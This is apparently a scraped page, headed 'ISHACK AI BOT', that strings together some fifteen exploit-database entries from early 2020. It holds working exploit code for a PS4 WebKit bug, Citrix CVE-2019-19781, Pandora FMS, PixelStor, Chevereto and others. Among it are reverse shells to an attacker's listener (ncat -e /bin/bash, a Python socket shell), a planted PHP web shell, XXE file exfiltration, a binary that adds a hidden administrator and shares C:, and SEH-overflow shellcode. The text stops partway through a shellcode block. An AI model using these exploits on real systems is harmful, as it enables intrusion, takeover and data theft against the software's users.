ISHACK AI BOT

/* bad_hoist ============ Exploit implementation of [CVE-2018-4386](https://bugs.chromium.org/p/project-zero/issues/detail?id=1665). Obtains addrof/fakeobj and arbitrary read/write primitives. Supports PS4 consoles on 6.XX. May also work on older firmware versions, but I am not sure. Bug was fixed in firmware 7.00. EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47893.zip */ var STRUCTURE_SPRAY_SIZE = 0x1800; var g_confuse_obj = null; var g_arb_master = null; var g_arb_slave = new Uint8Array(0x2000); var g_leaker = {}; var g_leaker_addr = null; var g_structure_spray = []; var dub = new Int64(0x41414141, 0x41414141).asDouble(); var g_inline_obj = { a: dub, b: dub, }; function spray_structs() { for (var i = 0; i < STRUCTURE_SPRAY_SIZE; i++) { var a = new Uint32Array(0x1) a["p" + i] = 0x1337; g_structure_spray.push(a); // keep the Structure objects alive. } } function trigger() { var o = { 'a': 1 }; var test = new ArrayBuffer(0x100000); g_confuse_obj = {}; var cell = { js_cell_header: new Int64([ 0x00, 0x8, 0x00, 0x00, // m_structureID, current guess 0x0, // m_indexingType 0x27, // m_type, Float64Array 0x18, // m_flags, OverridesGetOwnPropertySlot | // InterceptsGetOwnPropertySlotByIndexEvenWhenLengthIsNotZero 0x1 // m_cellState, NewWhite ]).asJSValue(), butterfly: false, // Some arbitrary value vector: g_inline_obj, len_and_flags: (new Int64('0x0001000100000020')).asJSValue() }; g_confuse_obj[0 + "a"] = cell; g_confuse_obj[1 + "a"] = {}; g_confuse_obj[1 + "b"] = {}; g_confuse_obj[1 + "c"] = {}; g_confuse_obj[1 + "d"] = {}; for (var j = 0x5; j < 0x20; j++) { g_confuse_obj[j + "a"] = new Uint32Array(test); } for (var k in o) { { k = { a: g_confuse_obj, b: new ArrayBuffer(test.buffer), c: new ArrayBuffer(test.buffer), d: new ArrayBuffer(test.buffer), e: new ArrayBuffer(test.buffer), 1: new ArrayBuffer(test.buffer), }; function k() { return k; } } o[k]; if (g_confuse_obj["0a"] instanceof Uint32Array) { return; } } } function setup_arb_rw() { var jsCellHeader = new Int64([ 0x00, 0x08, 0x00, 0x00, // m_structureID, current guess 0x0, // m_indexingType 0x27, // m_type, Float64Array 0x18, // m_flags, OverridesGetOwnPropertySlot | // InterceptsGetOwnPropertySlotByIndexEvenWhenLengthIsNotZero 0x1 // m_cellState, NewWhite ]); g_fake_container = { jsCellHeader: jsCellHeader.asJSValue(), butterfly: false, // Some arbitrary value vector: g_arb_slave, lengthAndFlags: (new Int64('0x0001000000000020')).asJSValue() }; g_inline_obj.a = g_fake_container; g_confuse_obj["0a"][0x4] += 0x10; g_arb_master = g_inline_obj.a; g_arb_master[0x6] = 0xFFFFFFF0; } function read(addr, length) { if (!(addr instanceof Int64)) addr = new Int64(addr); g_arb_master[4] = addr.low32(); g_arb_master[5] = addr.hi32(); var a = new Array(length); for (var i = 0; i < length; i++) a[i] = g_arb_slave[i]; return a; } function read8(addr) { return read(addr, 1)[0]; } function read16(addr) { return Struct.unpack(Struct.int16, read(addr, 2)); } function read32(addr) { return Struct.unpack(Struct.int32, read(addr, 4)); } function read64(addr) { return new Int64(read(addr, 8)); } function readstr(addr) { if (!(addr instanceof Int64)) addr = new Int64(addr); g_arb_master[4] = addr.low32(); g_arb_master[5] = addr.hi32(); var a = []; for (var i = 0;; i++) { if (g_arb_slave[i] == 0) { break; } a[i] = g_arb_slave[i]; } return String.fromCharCode.apply(null, a); } function write(addr, data) { if (!(addr instanceof Int64)) addr = new Int64(addr); g_arb_master[4] = addr.low32(); g_arb_master[5] = addr.hi32(); for (var i = 0; i < data.length; i++) g_arb_slave[i] = data[i]; } function write8(addr, val) { write(addr, [val]); } function write16(addr, val) { write(addr, Struct.pack(Struct.int16, val)); } function write32(addr, val) { write(addr, Struct.pack(Struct.int32, val)); } function write64(addr, val) { if (!(val instanceof Int64)) val = new Int64(val); write(addr, val.bytes()); } function writestr(addr, str) { if (!(addr instanceof Int64)) addr = new Int64(addr); g_arb_master[4] = addr.low32(); g_arb_master[5] = addr.hi32(); for (var i = 0; i < str.length; i++) g_arb_slave[i] = str.charCodeAt(i); g_arb_slave[str.length] = 0; // null character } function setup_obj_leaks() { g_leaker.leak = false; g_inline_obj.a = g_leaker; g_leaker_addr = new Int64(g_confuse_obj["0a"][4], g_confuse_obj["0a"][5]).add(0x10); debug_log("obj_leaker address @ " + g_leaker_addr); } function addrof(obj) { g_leaker.leak = obj; return read64(g_leaker_addr); } function fakeobj(addr) { write64(g_leaker_addr, addr); return g_leaker.leak; } function typed_array_buf_addr(typed_array) { return read64(addrof(typed_array).add(0x10)); } function cleanup() { var u32array = new Uint32Array(8); header = read(addrof(u32array), 0x10); write(addrof(g_arb_master), header); write(addrof(g_confuse_obj['0a']), header); // Set length to 0x10 and flags to 0x1 // Will behave as OversizeTypedArray which can survive gc easily write32(addrof(g_arb_master).add(0x18), 0x10); write32(addrof(g_arb_master).add(0x1C), 0x1); // write32(addrof(g_confuse_obj['0a']).add(0x18), 0x10); write32(addrof(g_confuse_obj['0a']).add(0x1C), 0x1); write32(addrof(g_arb_slave).add(0x1C), 0x1); var empty = {}; header = read(addrof(empty), 0x8); write(addrof(g_fake_container), header); } function start_exploit() { debug_log("Spraying Structures..."); spray_structs(); debug_log("Structures sprayed!"); debug_log("Triggering bug..."); trigger(); debug_log("Bug successfully triggered!"); debug_log("Crafting fake array for arbitrary read and write..."); setup_arb_rw(); debug_log("Array crafted!"); debug_log("Setting up arbitrary object leaks..."); setup_obj_leaks(); debug_log("Arbitrary object leaks achieved!"); debug_log("Cleaning up corrupted structures..."); cleanup(); debug_log("Cleanup done!"); debug_log("Starting post exploitation..."); } start_exploit();

# Exploit Title: TotalAV 2020 4.14.31 - Privilege Escalation # Date: 2020-01-09 # Exploit Author: Kusol Watchara-Apanukorn # Vendor Homepage: https://www.totalav.com/ # Version: 4.14.31 # Fixed on: 5.3.35 # Tested on: Windows 10 x64 # CVE : CVE-2019-18194 # Vulnerability Description: # TotalAV 2020 4.14.31 has quarantine flaw that allows attacker escape of # privilege by using NTFS directory junction. **You can download vulnerability version with this link: https://install.protected.net/windows/cdn3/4.14.31/TotalAV_Setup.exe /////////////////////////////////// Proof of Concept ////////////////////////////////// 1. Plant the malicious file in this case we use DLL file 2. To exploit the vulnerability antivirus must detect the malicious dll 3. Move it to quarantine. 4. Attacker must create NTFS directory junction to restore Full step: https://www.youtube.com/watch?v=88qeaLq98Gc Vulnerability Disclosure Timeline: ================================== 17 Oct, 19 : Found Vulnerability 18 Oct, 19 : Vendor Notification 18 Oct, 19 : Request CVE 21 Oct, 19 : Vendor Response mid Dec, 19 : Vendor released new patched (v5.3.35) 09 Jan, 20: Vulnerability Disclosure

# Exploit Title: MSN Password Recovery 1.30 - XML External Entity Injection # Exploit Author: ZwX # Exploit Date: 2020-01-08 # Vendor Homepage : https://www.top-password.com/ # Software Link: https://www.top-password.com/download/MSNPRSetup.exe # Tested on OS: Windows 10 [+] Exploit : (PoC) =================== 1) python -m SimpleHTTPServer 8000 2) Create file (.xml) 3) Create file Payload.dtd 4) Open the software MSN Password Recovery 5) Click the 'Help' button and a 'Msn Password Recovery' window opens 6) Click the 'Favorites' tab and add in Path Current the path of your file (.XML) Ex : file:///C:/Users/ZwX/Desktop/file.xml 7) Click the 'View' button 8) External Entity Injection Successful [+] XXE.xml : ============== <?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY % file SYSTEM "C:\Windows\win.ini"> <!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd"> %dtd;]> <pwn>&send;</pwn> [+] Payload.dtd : ================= <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>"> %all; [+] Result Exploitation : ========================= C:\>python -m SimpleHTTPServer 8000 Serving HTTP on 0.0.0.0 port 8000 ... ZwX-PC - - [08/Jan/2020 20:32:36] "GET /payload.dtd HTTP/1.1" 200 - ZwX-PC - - [08/Jan/2020 20:32:37] "GET /?;%20for%2016-bit%20app%20support[fonts][extensions][mci%20extensions][files][Mail]MAPI=1 HTTP/1.1" 200 -

# Exploit Title: Pandora 7.0NG - Remote Code Execution # Date: 2019-11-14 # Exploit Author: Askar (@mohammadaskar2) # CVE: CVE-2019-20224 # Vendor Homepage: https://pandorafms.org/ # Software link: https://pandorafms.org/features/free-download-monitoring-software/ # Version: v7.0NG # Tested on: CentOS 7.3 / PHP 5.4.16 #!/usr/bin/python3 import requests import sys if len(sys.argv) != 6: print("[+] Usage : ./exploit.py target username password ip port") exit() target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] ip = sys.argv[4] port = int(sys.argv[5]) request = requests.session() login_info = { "nick": username, "pass": password, "login_button": "Login" } login_request = request.post( target+"/pandora_console/index.php?login=1", login_info, verify=False, allow_redirects=True ) resp = login_request.text if "User not found in database" in resp: print("[-] Login Failed") exit() else: print("[+] Logged In Successfully") print("[+] Sending crafted graph request ..") body_request = { "date": "0", "time": "0", "period": "0", "interval_length": "0", "chart_type": "netflow_area", "max_aggregates": "1", "address_resolution": "0", "name": "0", "assign_group": "0", "filter_type": "0", "filter_id": "0", "filter_selected": "0", "ip_dst": "0", "ip_src": '";ncat -e /bin/bash {0} {1} #'.format(ip, port), "draw_button": "Draw" } draw_url = target + "/pandora_console/index.php?sec=netf&sec2=operati=on/netflow/nf_live_view&pure=0" print("[+] Check your netcat ;)") request.post(draw_url, body_request)

# Exploit Title: ASTPP 4.0.1 VoIP Billing - Database Backup Download # Date: 2019-11-18 # Exploit Author: Fabien AUNAY # Vendor Homepage: https://www.astppbilling.org/ # Software Link: https://github.com/iNextrix/ASTPP/tree/v4.0.1 # Version: 4.0.1 vendor default setup script # Tested on: Debian 9 - CentOS 7 # CVE : - ########################################################################################################### ASTPP 4.0.1 VoIP Billing Unauthenticated Predictable database backup download A Smart TelePhony Platform for Individual Business, Wholesale and Residential VoIP Service Providers! It is available as an open source solution. It means without any investment, one can start his telephony business using ASTPP. ASTPP, being one of the most powerful VoIP Billing Software, thrives to benefit its users by providing a comprehensive telephony solution. This open source solution has lifted itself up from a mere VoIP billing solution to “A Smart TelePhony Platform”. The latest version of ASTPP is provisioned with some advanced functional modules which are designed to eliminate the need of multiple solutions to run a VoIP business. It has integrated hosted IP PBX, Class 4/5 Softswitch, and complete invoicing and billing solution developed by leveraging Smart Technology. When administrator performs a ASTPP backup in web interface (Configuration / Database Restore / Create) the file name follows a semi-predictable pattern located in /var/www/html/astpp/database_backup/. The file name can be FUZZED for data exfiltration with the following pattern: astpp_20200110080136.sql.gz Pattern review: - astpp_ - year - month - day - 6 PIN digit Steps: Objective 1 : Generate your 6 PIN list Objective 2 : FUZZ the target URL Objective 3 : Download the mysqldump ########################################################################################################### Objective 1: Generate your 6 PIN list POC: crunch 6 6 0123456789 > pin_fuzzer.list Objective 2 : FUZZ the target URL POC: wfuzz --hc 302 -w pin_fuzzer.list 'http://127.0.0.1/database_backup/astpp_20200110FUZZ.sql.gz' =================================================================== ID Response Lines Word Chars Payload =================================================================== 000080137: 200 1135 L 6859 W 550239 Ch "080136" Objective 3 : Download the mysqldump POC: wget http://127.0.0.1/database_backup/astpp_20200110080136.sql.gz astpp_20200110080136.sql.gz 100%[===============================================================================>] 296,70K 1,05MB/s ds 0,3

# Exploit Title: PixelStor 5000 - Remote Code Execution # Product: PixelStor 5000 # Vendor: Rasilient # Date: 2020-01-08 # Exploit Author: .:UND3R:. # Vendor Homepage: http://rasilient.com # Version: K:4.0.1580-20150629 (KDI Version) # Tested on: K:4.0.1580-20150629 (KDI Version) # CVE: CVE-2020-6756 # URL Author: https://pwnedchile.com # Thanks: Dani Pelotocino <3, Roit import requests, sys def poc(target, cmd): url = target + "/Option/languageOptions.php" headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close", "Upgrade-Insecure-Requests": "1"} data = {"lang": ";" + cmd + ";/bin/echo -n en"} r = requests.post(url, headers=headers, data=data) if(r.status_code == 200): print("\nPwned :]") else: print("\nNot vulnerable :(") print("PixelStor 5000 RCE exploit\nVersion: K:4.0.1580-20150629 (KDI Version)\n\nAuthor: .:UND3R:.\nURL: https://pwnedchile.com\nThanks: Dani Pelotocino <3") if len(sys.argv) !=2: print("\n[+] Usage: python " + sys.argv[0] + " <url>\n") sys.exit(1) if __name__ == "__main__": url = sys.argv[1] cmd = raw_input("\n[Linux Command]:") poc(url, cmd) #EoF

#!/bin/bash # Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781 # Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a' # Release Date : 11/01/2020 # Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia echo "================================================================================= ___ _ _ ____ ___ _ _ | _ \ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _ | _/| '_|/ _ \ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \ | | | ' \ / _' || |/ _' | |_| |_| \___/_/ |\___|\__| \__| /___|\___||_| \___/ |___||_||_|\__,_||_|\__,_| |__/ CVE-2019-19781 =================================================================================" ############################## if [ -z "$1" ]; then echo -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\n' exit; fi filenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1); curl -s -k "https://$1/vpn/../vpns/portal/scripts/newbm.pl" -d "url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'$2 | tee /netscaler/portal/templates/$filenameid.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb" -H "NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is echo -ne "\n" ;curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -s -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is echo -ne "Command Output :\n" curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is

#!/usr/bin/python3 # # Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 # # You only need a listener like netcat to catch the shell. # # Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White # # Tool Written by: Rob Simon and David Kennedy import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings import random import string import time from random import randint import argparse import sys # random string generator def randomString(stringLength=10): letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(stringLength)) # our random string for filename - will leave artifacts on system filename = randomString() randomuser = randomString() # generate random number for the nonce nonce = randint(5, 15) # this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script # note that the file location will be in /netscaler/portal/templates/filename.xml def stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport): # encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC) encoded = "" i=0 text = ("""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'""" % (attackerip, attackerport)) while i < len(text): encoded = encoded + "chr("+str(ord(text[i]))+") . " i += 1 encoded = encoded[:-3] payload="[% template.new({'BLOCK'='print readpipe(" + encoded + ")'})%]" headers = ( { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0', 'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename), 'NSC_NONCE' : '%s' % (nonce), }) data = ( { "url" : "127.0.0.1", "title" : payload, "desc" : "desc", "UI_inuse" : "a" }) url = ("https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl" % (victimip, victimport)) requests.post(url, data=data, headers=headers, verify=False) # this is our second stage that triggers the exploit for us def stage2(filename, randomuser, nonce, victimip, victimport): headers = ( { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0', 'NSC_USER' : '%s' % (randomuser), 'NSC_NONCE' : '%s' % (nonce), }) requests.get("https://%s:%s/vpn/../vpns/portal/%s.xml" % (victimip, victimport, filename), headers=headers, verify=False) # start our main code to execute print(''' .o oOOOOOOOo OOOo Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB' `O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO OOOOO '"OOOOOOOOOOOOOOOO"` oOO oOOOOOba. .adOOOOOOOOOOba .adOOOOo. oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO "OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO" Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :` : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? . . oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo '%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO': `$" `OOOO' `O"Y ' `OOOO' o . . . OP" : o . : Citrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 Tool Written by: Rob Simon and Dave Kennedy Contributions: The TrustedSec Team Website: https://www.trustedsec.com INFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/ This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used to append files in an XML format to the victim machine. This in turn allows for remote code execution. Be sure to cleanup these two file locations: /var/tmp/netscaler/portal/templates/ /netscaler/portal/templates/ Usage: python citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>\n''') # parse our commands parser = argparse.ArgumentParser() parser.add_argument("target", help="the vulnerable server with Citrix (defaults https)") parser.add_argument("targetport", help="the target server web port (normally on 443)") parser.add_argument("attackerip", help="the attackers reverse listener IP address") parser.add_argument("attackerport", help="the attackersa reverse listener port") args = parser.parse_args() print("[*] Firing STAGE1 POST request to create the XML template exploit to disk...") print("[*] Saving filename as %s.xml on the victim machine..." % (filename)) # trigger our first post stage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport) print("[*] Sleeping for 2 seconds to ensure file is written before we call it...") time.sleep(2) print("[*] Triggering GET request for the newly created file with a listener waiting...") print("[*] Shell should now be in your listener... enjoy. Keep this window open..") print("[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/") # trigger our second post stage2(filename, randomuser, nonce, args.target, args.targetport)

# Exploit Title: Chevereto 3.13.4 Core - Remote Code Execution # Date: 2020-01-11 # Exploit Author: Jinny Ramsmark # Vendor Homepage: https://chevereto.com/ # Software Link: https://github.com/Chevereto/Chevereto-Free/releases # Version: 1.0.0 Free - 1.1.4 Free, <= 3.13.4 Core # Tested on: Ubuntu 19.10, PHP 7.3, Apache/2.4.41 # CVE : N/A from urllib import request, parse from time import sleep #Python3 #Needs to have a valid database server, database and user to exploit #1.0.0 Free version confirmed vulnerable #1.1.4 Free version confirmed vulnerable #3.13.4 Core version confirmed vulnerable def main(): target = 'http://cheveretoinstallation/' cookie = 'PHPSESSID=89efba681a8bb81d32cd10d3170baf6e' db_host = 'ip_to_valid_mysql' db_name = 'valid_db' db_user = 'valid_user' db_pass = 'valid_pass' db_table_prefix = 'chv_' inject = "';if(strpos(file_get_contents('images/license.php'), '$_POST[\"ccc\"]') === false){file_put_contents('images/license.php','if(isset($_POST[\"ccc\"])){;system($_POST[\"ccc\"]);}');}//" #Clean data for when we want to clean up the settings file params = {'db_host': db_host, 'db_name': db_name, 'db_user': db_user, 'db_pass': db_pass, 'db_table_prefix': db_table_prefix} data = parse.urlencode(params).encode() #Settings data with injected code params['db_table_prefix'] += inject dataInject = parse.urlencode(params).encode() #Do inject doPostRequest(target + 'install', dataInject, cookie) sleep(1) #Request index page to run the injected code doRequest(target) sleep(1) #Do a clean request to clean up the settings.php file doPostRequest(target + 'install', data, cookie) def doPostRequest(target, data, cookie): req = request.Request(target, data=data) req.add_header('Cookie', cookie) resp = request.urlopen(req) def doRequest(target): req = request.Request(target) resp = request.urlopen(req) if __name__ == '__main__': main()

# Exploit Title: SpotDialup 1.6.7 - 'Name' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/spotdialup_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install SpotDialup 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Name' and click on 'Ok' 6.SpotDialup Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

# Exploit Title: SpotOutlook 1.2.6 - 'Name' Denial of Service (PoC) # Exploit Author: Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/spotoutlook_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install SpotOutlook 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Name' and click on 'Ok' 6.SpotOutlook Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

# Exploit Title: Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions # Exploit Author: ZwX # Exploit Date: 2020-01-12 # Vendor Homepage : https://advancedsystemrepair.com/ # Software Link: http://advancedsystemrepair.com/ASRProInstaller.exe # Tested on OS: Windows 10 # Proof of Concept (PoC): ========================== C:\Program Files\Advanced System Repair Pro 1.9.1.7.0>icacls *.exe AdvancedSystemRepairPro.exe Everyone:(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) dsutil.exe Everyone:(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) tscmon.exe Everyone:(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) #Exploit code(s): ================= 1) Compile below 'C' code name it as "AdvancedSystemRepairPro.exe" #include<windows.h> int main(void){ system("net user hacker abc123 /add"); system("net localgroup Administrators hacker /add"); system("net share SHARE_NAME=c:\ /grant:hacker,full"); WinExec("C:\\Program Files\\Advanced System Repair Pro 1.9.1.7.0\\~AdvancedSystemRepairPro.exe",0); return 0; } 2) Rename original "AdvancedSystemRepairPro.exe" to "~AdvancedSystemRepairPro.exe" 3) Place our malicious "AdvancedSystemRepairPro.exe" in the Advanced System Repair Pro 1.9.1.7.0 directory 4) Disconnect and wait for a more privileged user to connect and use AdvancedSystemRepairPro IDE. Privilege Successful Escalation

# Exploit Title: Top Password Software Dialup Password Recovery 1.30 - Denial of Service (PoC) # Date: 2020-01-12 # Exploit Author: Antonio de la Piedra # Vendor Homepage: https://www.top-password.com/ # Software Link: https://www.top-password.com/download/DialupPRSetup.exe # Version: 1.30 # Tested on: Windows 7 SP1 32-bit # Copy paste the contents of poc.txt into the # User Name / Registration Code input fields. #!/usr/bin/python poc =3D "A"*5000 file =3D open("poc.txt","w") file.write(poc) file.close()

# Exploit Title: Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/backeyrecovery_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install Backup Key Recovery 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Name' and click on 'Ok' 6.Backup Key Recovery Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

# Exploit Title: Allok Video Converter 4.6.1217 - Stack Overflow (SEH) # Date: 2020-01-12 # Exploit Author: Antonio de la Piedra # Vendor Homepage: https://www.alloksoft.com # Software Link: https://www.alloksoft.com/allok_vconverter.exe # Version: 4.6.1217 # Tested on: Windows 7 SP1 32-bit # Copy paste the contents of poc.txt into the License Name input field # of Allok Video Converter 4.6.1217 to execute calc.exe. nseh_offset = 780 total = 1000 # msfvenom -p windows/exec -b '\x00\x0a\x0d' -f python --var-name shellcode= _calc CMD=calc.exe EXITFUNC=thread shellcode_calc = b"" shellcode_calc += b"\xdd\xc0\xbe\x48\x33\xfd\x23\xd9\x74\x24" shellcode_calc += b"\xf4\x5f\x33\xc9\xb1\x31\x83\xef\xfc\x31" shellcode_calc += b"\x77\x14\x03\x77\x5c\xd1\x08\xdf\xb4\x97" shellcode_calc += b"\xf3\x20\x44\xf8\x7a\xc5\x75\x38\x18\x8d" shellcode_calc += b"\x25\x88\x6a\xc3\xc9\x63\x3e\xf0\x5a\x01" shellcode_calc += b"\x97\xf7\xeb\xac\xc1\x36\xec\x9d\x32\x58" shellcode_calc += b"\x6e\xdc\x66\xba\x4f\x2f\x7b\xbb\x88\x52" shellcode_calc += b"\x76\xe9\x41\x18\x25\x1e\xe6\x54\xf6\x95" shellcode_calc += b"\xb4\x79\x7e\x49\x0c\x7b\xaf\xdc\x07\x22" shellcode_calc += b"\x6f\xde\xc4\x5e\x26\xf8\x09\x5a\xf0\x73" shellcode_calc += b"\xf9\x10\x03\x52\x30\xd8\xa8\x9b\xfd\x2b" shellcode_calc += b"\xb0\xdc\x39\xd4\xc7\x14\x3a\x69\xd0\xe2" shellcode_calc += b"\x41\xb5\x55\xf1\xe1\x3e\xcd\xdd\x10\x92" shellcode_calc += b"\x88\x96\x1e\x5f\xde\xf1\x02\x5e\x33\x8a" shellcode_calc += b"\x3e\xeb\xb2\x5d\xb7\xaf\x90\x79\x9c\x74" shellcode_calc += b"\xb8\xd8\x78\xda\xc5\x3b\x23\x83\x63\x37" shellcode_calc += b"\xc9\xd0\x19\x1a\x87\x27\xaf\x20\xe5\x28" shellcode_calc += b"\xaf\x2a\x59\x41\x9e\xa1\x36\x16\x1f\x60" shellcode_calc += b"\x73\xf8\xfd\xa1\x89\x91\x5b\x20\x30\xfc" shellcode_calc += b"\x5b\x9e\x76\xf9\xdf\x2b\x06\xfe\xc0\x59" shellcode_calc += b"\x03\xba\x46\xb1\x79\xd3\x22\xb5\x2e\xd4" shellcode_calc += b"\x66\xd6\xb1\x46\xea\x37\x54\xef\x89\x47" poc = "" poc += "A"*nseh_offset poc += "\xEB\x0b\x90\x90" # jmp forward (nseh) poc += "\x59\x78\x03\x10" # pop pop ret (seh) poc += "\x90"*20 poc += shellcode_calc poc += "D"*(total - len(poc)) file = open("poc_seh.txt","w") file.write(poc) file.close()

# Exploit Title: Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH) # Date: 2020-01-12 # Exploit Author: Antonio de la Piedra # Vendor Homepage: https://www.alloksoft.com # Software Link: https://www.alloksoft.com/allok_rmconverter.exe # Version: 3.6.1217 # Tested on: Windows 7 SP1 32-bit # Copy paste the contents of poc_seh.txt into the License Name input field # of Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 to execute calc.exe. #!/usr/bin/python nseh_offset = 780 total = 1000 # msfvenom -p windows/exec -b '\x00\x0a\x0d' -f python --var-name shellcode_calc CMD=calc.exe EXITFUNC=thread shellcode_calc = b"" shellcode_calc += b"\xdd\xc0\xbe\x48\x33\xfd\x23\xd9\x74\x24" shellcode_calc += b"\xf4\x5f\x33\xc9\xb1\x31\x83\xef\xfc\x31" shellcode_calc += b"\x77\x14\x03\x77\x5c\xd1\x08\xdf\xb4\x97" shellcode_calc += b"\xf3\x20\x44\xf8\x7a\xc5\x75\x38\x18\x8d" shellcode_calc += b"\x25\x88\x6a\xc3\xc9\x63\x3e\xf0\x5a\x01" shellcode_calc += b"\x97\xf7\xeb\xac\xc1\x36\xec\x9d\x32\x58" shellcode_calc += 